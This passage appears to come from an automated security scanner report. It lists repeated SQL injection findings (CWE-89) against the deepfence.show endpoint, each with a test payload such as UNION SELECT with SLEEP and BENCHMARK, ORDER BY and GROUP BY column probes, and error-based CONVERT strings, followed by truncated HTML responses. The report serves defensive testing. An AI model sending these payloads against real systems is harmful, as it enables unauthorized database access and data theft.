href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #537\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #538\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #539\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1' ORDER BY 3--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #540\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #541\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io WHERE 1=1 AND 1=0--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #542\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOR 1=0--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #543\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #544\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #545\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #546\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 15--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #547\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #548\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+\nCHAR(116)+CHAR(69)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #549\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1' GROUP BY 1,2,3--+ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #550\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 1=0 AND '%'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 